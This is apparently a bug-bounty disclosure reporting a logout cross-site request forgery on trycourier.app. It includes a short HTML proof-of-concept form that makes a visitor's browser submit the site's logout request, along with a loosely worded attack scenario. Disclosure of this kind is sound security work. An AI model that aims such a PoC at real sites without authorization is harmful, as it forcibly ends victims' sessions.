Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. … If the victim is an administrative account, CSRF can compromise the entire web application.
1.Create a CSRF logout POC using the following code.
Code That i use:–
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=“https://www.trycourier.app/logout”>
<input type=“submit” value=“Submit request” />
</form>
</body>
</html>
I have provided a attack senirio for it please check it
Logout any victim into the attacker account, send the HTML made by attacker and then logout him from the Session.
The hacker selected the Cross-Site Request Forgery (CSRF) weakness. This vulnerability type requires contextual information from the hacker.